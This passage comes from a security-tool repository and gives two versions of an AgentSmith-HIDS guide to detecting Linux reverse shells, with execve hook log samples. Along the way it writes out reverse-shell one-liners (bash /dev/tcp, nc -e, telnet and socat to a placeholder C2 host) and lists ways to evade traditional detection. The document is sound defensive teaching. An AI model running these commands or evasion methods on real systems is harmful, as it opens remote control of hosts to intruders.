obediently.\n\n![2](2.png)\n\nWhen facing this most basic reverse shell, people seem to use the same detection approach: if a bash process's stdin/stdout (standard input / standard output) points to a socket connection, we consider it probably a reverse shell.\n\nUsually we review the stdin/stdout of a process under `/proc/pid/fd`. 
By default 0 is stdin, 1 is stdout, and 2 is stderr.\n\n![3](3.png)\n\nSuch detection is pretty simple with AgentSmith-HIDS; we can use the data obtained by the execve hook here:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/bash\",\n    \"exe\":\"/usr/bin/bash\",\n    \"argv\":\"bash -i \",\n    \"pid\":\"6364\",\n    \"ppid\":\"2549\",\n    \"pgid\":\"6364\",\n    \"tgid\":\"6364\",\n    \"comm\":\"bash\",\n    \"nodename\":\"test\",\n    \"stdin\":\"socket:[80649]\",\n    \"stdout\":\"socket:[80649]\",\n    \"sessionid\":\"3\",\n    \"dip\":\"127.0.0.1\",\n    \"dport\":\"233\",\n    \"sip\":\"127.0.0.1\",\n    \"sport\":\"60620\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->2093(sshd)->2096(bash)->2147(fish)->2549(bash)->6364(bash)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"6364\",\n    \"socket_process_exe\":\"/usr/bin/bash\",\n    \"SSH_CONNECTION\":\"192.168.165.1 50422 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580104472249\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\",\n    \"socket_process_exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\"\n}\n```\n\nPay attention to exe, stdin and stdout. Using the feature we just mentioned, you can easily find this type of reverse shell, and you can also locate the C2 with the help of **dip/dport/sip/sport**.\n\nOther similar ones which you may already know well, such as python/perl reverse shell scripts, we will not discuss here; most of them point the stdin/out of bash at the socket connection, which is the same in nature.\n\n\n\n#### 4. 
The easiest reverse shell(2)\n\nIn addition to `bash -i`, there is another common way is ` nc -e`, which is used as follows:\n\n`nc -e /usr/bin/bash c2_ip c2_port`\n\nLet's follow the previous ideas to see what the stdin and stdout of the bash process look like, and whether there are obvious input and output points to the network connection:\n\n![5](5.png)\n\n![6](6.png)\n\nUnfortunately, it is not the same case like the one above. However, we can still use following inforamtion to detect it:\n\n* argv is `nc -e`\n* bash's parent process is `nc`\n* The bash process or its parent process has an abnormal network connection\n* Track the stdin / out pipe and try to detect if the process of the final pipe connection generated an abnormal network connection\n\nThat seems a bit exhausting, while if you are using AgentSmith-HIDS, there are other detection methods, we will talk about later.\n\n\n\n#### 5.Advanced Version(1)\n\n`telnet c2_ip c2_port 0 <SOME_DEVNAME | / bin / bash 1> SOME_DEVNAME`\n\n![7](7.png)\n\nLet's look at the stdin/stdout of the bash process:\n\n![8](8.png)\n\n\n\n#### 5.Advanced version(2)\n\n`socat exec: 'bash -li', pty, stderr, setid, sigint, sane tcp: c2_ip: c2_port`\n\n![9](9.png)\n\nLet's look at the stdin/stdout of the bash process:\n\n![10](10.png)\n\n\n\n\n\n#### 6. Other backdoor implementations\n\nHere is an example using MSF backdoor:\n\n![11](11.png)\n\nWell, if there is no bash process at all, the traditional approach will obviously fail here.\n\nThis kind of scenario happens a lot, because in nature **bash** is a **for{ execve() }**.\n\n\n\n#### 7. Let's talk about how to bypass traditional detection methods\n\n* You can use the advanced methods mentioned above\n* Use mature backdoors, such as msf, apache backdoor module and nginx backdoor module, etc.\n* Implement elf loader yourself\n* Obfuscate the file name, process name, and/or md5 of the tool or binary file used by the reverse shell, such as nc/bash etc. 
You can also avoid detection by compiling your own source code\n* and many more......\n\n\n\n#### 8. Summarize the characteristics of the rebound shell\n\nNow we can see that the reverse shell is actually a behavior that is very difficult to be fully detected, because its essence is: **execution of execve or something under remote control**. According to the traditional approach, we focus on the input and output of **bash**, but **determining it is a bash** is something **impossible and meaningless**, since it can be easily to be bypassed if we only look at process name and/or file name. Secondly, bash is not necessarily the only option for hackers.\n\nThankfully, we still have a glimmer of hope to achieve a more comprehensive detection. Let's try to summarize and sort it out:\n\n* The reverse shell is usually somebody executes something on a compromised host remotely\n* Most of the execution is via execve syscall (of course there is still a small part of cases isn't)\n* In nature, the execve creates a new process. For example, when we execute 'ls' in bash, bash is the parent process, 'ls' is the child process, and it is the newly created process\n* The child process inherits the file descriptor(fd) of the parent process (not definately but most of the time it does)\n* From the above points, we can infer that we can switch from **observing an abnormal bash** to **observing an abnormal process**, because parent and child processes have file descriptor inheritance\n\n\n\n#### 9. 
How to use AgentSmith-HIDS to detect a reverse shell\n\nAccording to the above examples and inference, the detection methods can be:\n\n* Traditional detection approach, such as: abnormal stdin/stdout in the bash process, or abnormal argv, or an abnormal network connection in the bash process tree, etc.\n* Locate a few binary files that are **most likely to be used by intruders if there is a reverse shell** and **Normally the most likely binary files are used under ssh login**, such as ls/cat/ip, etc. If the **stdin/stdout** and **tty** of these processes are found to be inconsistent, you got an alarm generated\n* Locate a few binary files that are **most likely to be used by intruders if there is a reverse shell** and **Normally the most likely binary files are used under ssh login**, such as ls/cat/ip, etc. If the **dip/dport/sip/sport** and **SSH_CONNECTION** of these processes are found inconsistent, once again you got an alarm generated\n\n\n\nIf you find a case or receive an alarm of reverse shell, and you are lucky, **dip/dport/sip/sport** will tell you some valuable information, of course on the contrary, it may also be worthless, and you need to manually check for more evidence yourself (such as: advanced version 1 Happening).\n\n\n\nFollowing are some examples, all with execution of 'ls', you can mainly observe **stdin/out** and **tty_name**, **dip/dport/sip/sport**, **socket_process_pid/socket_process_exe** And **SSH_CONNECTION**:\n\n\n\n**\"The easiest reverse shell(2)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls \",\n    \"pid\":\"25131\",\n    \"ppid\":\"25118\",\n    \"pgid\":\"25117\",\n    \"tgid\":\"25131\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"pipe:[93621]\",\n    \"stdout\":\"pipe:[93622]\",\n    \"sessionid\":\"11\",\n    \"dip\":\"127.0.0.1\",\n    \"dport\":\"233\",\n    
\"sip\":\"127.0.0.1\",\n    \"sport\":\"36246\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25117(nc)->25118(bash)->25131(ls)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"25131\",\n    \"socket_process_exe\":\"/usr/bin/ls\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580122709834\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\"\n}\n```\n\n\n\n**\"Advanced Version(1)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls \",\n    \"pid\":\"25503\",\n    \"ppid\":\"25495\",\n    \"pgid\":\"25494\",\n    \"tgid\":\"25503\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"pipe:[94503]\",\n    \"stdout\":\"/dev/pts/0\",\n    \"sessionid\":\"11\",\n    \"dip\":\"192.168.165.1\",\n    \"dport\":\"64289\",\n    \"sip\":\"192.168.165.152\",\n    \"sport\":\"22\",\n    \"sa_family\":\"1\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25473(bash)->25495(bash)->25503(ls)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"16471\",\n    \"socket_process_exe\":\"/usr/sbin/sshd\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580123032502\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n\n\n**\"Advanced Version(2)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    
\"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls --color=auto \",\n    \"pid\":\"24697\",\n    \"ppid\":\"24676\",\n    \"pgid\":\"24697\",\n    \"tgid\":\"24697\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"/dev/pts/4\",\n    \"stdout\":\"/dev/pts/4\",\n    \"sessionid\":\"11\",\n    \"dip\":\"127.0.0.1\",\n    \"dport\":\"233\",\n    \"sip\":\"127.0.0.1\",\n    \"sport\":\"36150\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->24675(socat)->24676(bash)->24697(ls)\",\n    \"tty_name\":\"pts4\",\n    \"socket_process_pid\":\"24675\",\n    \"socket_process_exe\":\"/usr/bin/socat\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580122431825\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"f639a31fa3050bc78868d35b46390536\"\n}\n```\n\n\n\n**\"MSF backdoor\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls \",\n    \"pid\":\"24587\",\n    \"ppid\":\"18303\",\n    \"pgid\":\"18289\",\n    \"tgid\":\"24587\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"pipe:[88900]\",\n    \"stdout\":\"pipe:[88901]\",\n    \"sessionid\":\"11\",\n    \"dip\":\"192.168.165.152\",\n    \"dport\":\"233\",\n    \"sip\":\"192.168.165.152\",\n    \"sport\":\"46852\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->18289(backdoor)->18303(sh)->24587(ls)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"18289\",\n    \"socket_process_exe\":\"/root/backdoor\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    
\"user\":\"root\",\n    \"time\":\"1580122376221\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"1bc2f057dab264291f7e3117ebc2d50e\"\n}\n```\n\n\n\n#### 10. Summary\n\nCan it still be bypassed? The answer is possible. There are still ways there to bypass it. But don't worry, only one Hook information of AgentSmith-HIDS is used for detection today, there are many others for us to detect intrusion behavior from different dimensions, so stay tuned."
  },
  {
    "path": "doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/如何利用AgentSmith-HIDS检测反弹shell.md",
    "content": "# How to use AgentSmith-HIDS to detect a reverse shell\n\nA reverse shell is a long-established and most common post-intrusion behavior, used by everyone from APT groups down to script kiddies, and one that any HIDS must consider detecting. However, there are many ways to set up a reverse shell and they are extremely flexible, so general detection methods with low false-negative/false-positive rates are still rare. AgentSmith-HIDS, a product built specifically for intrusion detection, will bring you a detection approach with a different way of thinking.\n\n#### 1. What is a reverse shell\n\nWhen a hacker obtains access to a server, it is often impossible to connect to it in the forward direction (e.g. via SSH) because the server has no public IP, is behind a firewall, and so on. The compromised server therefore has to actively send its shell out to the controlling end to be taken over, hence the name **reverse shell**.\n\n![1](1.png)\n\n#### 2. AgentSmith-HIDS Execve Hook information in detail\n\nSince the topic of this article is using **AgentSmith-HIDS** to detect reverse shells, and the detection relies almost entirely on the Execve Hook information, it is necessary to explain the Execve Hook information carefully at the start.\n\nLet's first look at an example:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls --color=auto --indicator-style=classify \",\n    \"pid\":\"6766\",\n    \"ppid\":\"2202\",\n    \"pgid\":\"6766\",\n    \"tgid\":\"6766\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"/dev/pts/2\",\n    \"stdout\":\"/dev/pts/2\",\n    \"sessionid\":\"5\",\n    \"dip\":\"192.168.165.1\",\n    \"dport\":\"50431\",\n    \"sip\":\"192.168.165.152\",\n    \"sport\":\"22\",\n    \"sa_family\":\"1\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->2129(sshd)->2132(bash)->2202(fish)->6766(ls)\",\n    \"tty_name\":\"pts2\",\n    \"socket_process_pid\":\"2129\",\n    \"socket_process_exe\":\"/usr/sbin/sshd\",\n    \"SSH_CONNECTION\":\"192.168.165.1 50431 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580104906853\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\nSome of the fields and where they come from (the other basic fields are not repeated here):\n\n| Field                                 | Remark                                                       |\n| ------------------------------------- | ------------------------------------------------------------ |\n| nodename                              | The nodename of the Linux namespace, corresponding to the host name or the container name, etc. |\n| stdin/stdout                          | The process's standard input/output                          |\n| sessionid                             | The process's session id, which can be used for clustering and tracing analysis |\n| pid_tree                              | Process tree information                                     |\n| dip/dport/sip/sport                   | **The 4-tuple of the first socket found in the process tree this process belongs to (searched from bottom to top, AF_INET or AF_INET6 only)** |\n| socket_process_pid/socket_process_exe | The pid and exe of the process that owns the first valid socket |\n| tty_name                              | The process's tty                                            |\n| SSH_CONNECTION                        | Extracted from the environment variables: SSH connection information |\n| LD_PRELOAD                            | Extracted from the environment variables: LD_PRELOAD information |\n\nAmong these, **dip/dport/sip/sport** may be a bit hard to understand, so let's use the example above. From **exe** and **argv** we can tell that the **ls** command was executed, and from **dip/dport/sip/sport** and **socket_process_pid/socket_process_exe** we find that they point to **sshd** and an **ssh** connection. Since **ls** itself has no network connection, AgentSmith-HIDS searches upward until it finds a process with a valid socket or reaches the head of the tree. Because we ran **ls** after logging in to this server via **ssh**, it naturally finds the connection information of that **ssh** session. This can also be confirmed by comparing it with **SSH_CONNECTION** in the environment variables.\n\n![4](4.png)\n\nNote that this information can be interfered with. For performance reasons, I cannot extract all socket information, nor traverse every fd of every process, and these become potential limitations.\n\n\n\n#### 3. The simplest reverse shell\n\nThe simplest reverse shell is `bash -i`, used as follows:\n\n```bash\nbash -i >& /dev/tcp/c2_ip/c2_port 0>&1\n```\n\nThe `-i` option makes bash spawn an interactive shell, and handing the shell's input and output over to TCP yields a reverse shell. The controlling end only needs to run the following beforehand:\n\n```bash\nnc -l port\n```\n\nto listen on the specified port and wait for the shell to obediently come knocking.\n\n![2](2.png)\n\nFor this most basic reverse shell, the industry's detection approach is very uniform: if a bash process has its stdin/stdout (standard input/standard output) pointing to a socket connection, that bash is considered very likely to be reverse shell behavior.\n\nUsually a process's stdin/stdout can be inspected under `/proc/pid/fd`; by default 0 is stdin, 1 is stdout, and 2 is stderr.\n\n![3](3.png)\n\nThis kind of detection is very simple on AgentSmith-HIDS; it can be found from the data obtained by the execve hook:\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/bash\",\n    \"exe\":\"/usr/bin/bash\",\n    \"argv\":\"bash -i \",\n    \"pid\":\"6364\",\n    \"ppid\":\"2549\",\n    \"pgid\":\"6364\",\n    \"tgid\":\"6364\",\n    \"comm\":\"bash\",\n    \"nodename\":\"test\",\n    \"stdin\":\"socket:[80649]\",\n    \"stdout\":\"socket:[80649]\",\n    \"sessionid\":\"3\",\n    \"dip\":\"127.0.0.1\",\n    \"dport\":\"233\",\n    \"sip\":\"127.0.0.1\",\n    \"sport\":\"60620\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->2093(sshd)->2096(bash)->2147(fish)->2549(bash)->6364(bash)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"6364\",\n    \"socket_process_exe\":\"/usr/bin/bash\",\n    \"SSH_CONNECTION\":\"192.168.165.1 50422 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580104472249\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\",\n    \"socket_process_exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\"\n}\n```\n\nPay attention to `exe`, `stdin` and `stdout`: this characteristic is enough to find this type of reverse shell, and **dip/dport/sip/sport** can also be used to locate the C2.\n\nOther similar variants that everyone knows well, such as python/perl, will not be demonstrated further; most of them point bash's stdin/stdout at the socket connection and are essentially the same.\n\n\n\n#### 4. The simplest reverse shell(2)\n\nBesides `bash -i`, another very common method is `nc -e`, used as follows:\n\n```bash\nnc -e /usr/bin/bash c2_ip c2_port\n```\n\nFollowing the previous idea, let's see what the stdin and stdout of the bash process look like, and whether input and output obviously point to a network connection:\n\n![5](5.png)\n\n![6](6.png)\n\nUnfortunately, it is not the same as before, but we can still detect it using signals such as:\n\n* argv is `nc -e`\n* bash's parent process is `nc`\n* The bash process or its parent process has an abnormal network connection\n* Track the stdin/stdout pipe and try to detect whether the process at the far end of the pipe has an abnormal network connection\n\nand other methods. However, if you use AgentSmith-HIDS there are other detection methods, which we will discuss later.\n\n\n\n#### 5. Advanced Version(1)\n\n`telnet c2_ip c2_port 0<SOME_DEVNAME | /bin/bash 1>SOME_DEVNAME`\n\n![7](7.png)\n\nLet's look at the stdin/stdout of the bash process:\n\n![8](8.png)\n\n\n\n#### 5. Advanced Version(2)\n\n`socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:c2_ip:c2_port`\n\n![9](9.png)\n\nLet's look at the stdin/stdout of the bash process:\n\n![10](10.png)\n\n\n\n#### 6. Other backdoor implementations\n\nLet's use the MSF backdoor as an example:\n\n![11](11.png)\n\nHmm, under the traditional approach there is no bash process at all, so the traditional approach cannot detect this.\n\nScenarios like this are also very common, because in essence **bash** is just a **for{execve()}** loop.\n\n\n\n#### 7. Let's talk about how to bypass traditional detection methods\n\n* Any of the advanced methods mentioned above will do\n* Use a mature backdoor, such as msf, an apache backdoor module, an nginx backdoor module, etc.\n* Implement an ELF loader yourself\n* 
Obfuscate the file name/process name/md5 of the tools or binaries used by the reverse shell, such as nc/bash, etc.; compiling from source yourself is another way to avoid detection\n* and so on\n\n\n\n#### 8. Summary of the characteristics of a reverse shell\n\nBy now we can see that a reverse shell is actually a behavior that is very difficult to detect completely, because in essence it is: **executing execve, or executing something, under external control**. The traditional detection approach focuses on the input and output of **bash**, but **determining that it is bash** is itself **impossible and meaningless**, because if it is done by process name/file name it is far too easy to obfuscate; secondly, bash is not the only way to execute something.\n\nBut we still have a glimmer of hope for fairly comprehensive detection. Let's try to summarize and sort it out:\n\n* A reverse shell is usually an external party controlling the victim machine to execute something\n* Most of the execution goes through the execve syscall (of course a small part does not need to)\n* In essence execve creates a new process; for example, when we run ls under bash, bash is the parent process and ls is the child, the newly created process\n* The child process inherits the parent's file descriptors (not absolutely, but in most cases)\n* From the points above we can infer that we can switch from **observing an abnormal bash** to **observing an abnormal process**, because parent and child processes have a file descriptor inheritance relationship\n\n\n\n#### 9. How to use AgentSmith-HIDS to detect a reverse shell\n\nBased on the inferences above and the earlier examples, the detection methods are as follows:\n\n* The traditional detection methods, such as: the bash process has abnormal stdin/stdout, or abnormal argv, or bash's process tree has an abnormal network connection, etc.; these are not repeated here\n* Pick a few binaries that, if a reverse shell exists, **an intruder is highly likely to use** and that **under normal circumstances are highly likely to be used only in an ssh login session**, such as ls/cat/ip, etc.; if the **stdin/stdout** and **tty** of these processes are found to be inconsistent, raise an alarm\n* Pick the same kind of binaries, such as ls/cat/ip, etc.; if the **dip/dport/sip/sport** and **SSH_CONNECTION** of these processes are found to be inconsistent, raise an alarm\n\n\n\nIf an anomaly is found and you are lucky, **dip/dport/sip/sport** will tell you some valuable information; of course, it may also be completely worthless, and you will need to investigate manually (e.g. the Advanced Version(1) case).\n\n\n\nNext are some examples, all based on executing ls; focus mainly on **stdin/stdout** and **tty_name**, **dip/dport/sip/sport**, **socket_process_pid/socket_process_exe** and **SSH_CONNECTION**:\n\n\n\n**\"The simplest reverse shell(2)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls \",\n    \"pid\":\"25131\",\n    \"ppid\":\"25118\",\n    \"pgid\":\"25117\",\n    \"tgid\":\"25131\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"pipe:[93621]\",\n    \"stdout\":\"pipe:[93622]\",\n    \"sessionid\":\"11\",\n    \"dip\":\"127.0.0.1\",\n    \"dport\":\"233\",\n    \"sip\":\"127.0.0.1\",\n    \"sport\":\"36246\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25117(nc)->25118(bash)->25131(ls)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"25131\",\n    \"socket_process_exe\":\"/usr/bin/ls\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580122709834\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\"\n}\n```\n\n\n\n**\"Advanced Version(1)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls \",\n    \"pid\":\"25503\",\n    \"ppid\":\"25495\",\n    \"pgid\":\"25494\",\n    \"tgid\":\"25503\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"pipe:[94503]\",\n    \"stdout\":\"/dev/pts/0\",\n    \"sessionid\":\"11\",\n    \"dip\":\"192.168.165.1\",\n    \"dport\":\"64289\",\n    \"sip\":\"192.168.165.152\",\n    \"sport\":\"22\",\n    \"sa_family\":\"1\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25473(bash)->25495(bash)->25503(ls)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"16471\",\n    \"socket_process_exe\":\"/usr/sbin/sshd\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580123032502\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n\n\n**\"Advanced Version(2)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls --color=auto \",\n    \"pid\":\"24697\",\n    \"ppid\":\"24676\",\n    \"pgid\":\"24697\",\n    \"tgid\":\"24697\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"/dev/pts/4\",\n    \"stdout\":\"/dev/pts/4\",\n    \"sessionid\":\"11\",\n    \"dip\":\"127.0.0.1\",\n    \"dport\":\"233\",\n    \"sip\":\"127.0.0.1\",\n    \"sport\":\"36150\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->24675(socat)->24676(bash)->24697(ls)\",\n    \"tty_name\":\"pts4\",\n    \"socket_process_pid\":\"24675\",\n    \"socket_process_exe\":\"/usr/bin/socat\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580122431825\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"f639a31fa3050bc78868d35b46390536\"\n}\n```\n\n\n\n**\"MSF backdoor\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/usr/bin/ls\",\n    \"exe\":\"/usr/bin/ls\",\n    \"argv\":\"ls \",\n    \"pid\":\"24587\",\n    \"ppid\":\"18303\",\n    \"pgid\":\"18289\",\n    \"tgid\":\"24587\",\n    \"comm\":\"ls\",\n    \"nodename\":\"test\",\n    \"stdin\":\"pipe:[88900]\",\n    \"stdout\":\"pipe:[88901]\",\n    \"sessionid\":\"11\",\n    \"dip\":\"192.168.165.152\",\n    \"dport\":\"233\",\n    \"sip\":\"192.168.165.152\",\n    \"sport\":\"46852\",\n    \"sa_family\":\"2\",\n    \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->18289(backdoor)->18303(sh)->24587(ls)\",\n    \"tty_name\":\"pts0\",\n    \"socket_process_pid\":\"18289\",\n    \"socket_process_exe\":\"/root/backdoor\",\n    \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n    \"LD_PRELOAD\":\"\",\n    \"user\":\"root\",\n    \"time\":\"1580122376221\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n    \"socket_process_exe_md5\":\"1bc2f057dab264291f7e3117ebc2d50e\"\n}\n```\n\n\n\n#### 10. Summary\n\nCan it still be bypassed? Yes, it can; there are still quite a few ways to bypass it. But don't worry: today only one hook's information from AgentSmith-HIDS was used for the judgment, and there is plenty of other data for us to detect intrusion behavior from different dimensions, so stay tuned."
  }
]